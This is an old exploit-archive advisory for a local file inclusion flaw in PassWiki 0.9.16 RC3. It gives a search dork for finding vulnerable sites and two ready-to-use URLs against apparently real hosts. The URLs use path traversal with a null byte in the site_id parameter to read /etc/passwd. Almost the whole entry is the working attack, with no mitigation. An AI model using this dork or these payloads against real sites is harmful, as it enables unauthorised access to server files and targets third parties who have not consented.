PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability
# Published : 2008-05-31
# Author : mozi
# Previous Title : LulieBlog 1.2 Multiple Remote Vulnerabilities
# Next Title : BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability

dork: "powered by PassWiki"
example:
http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://inajob.no-ip.org/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00


author:mozi2weed@yahoo.com
http://rstzone.org

# www.Syue.com [2008-05-31]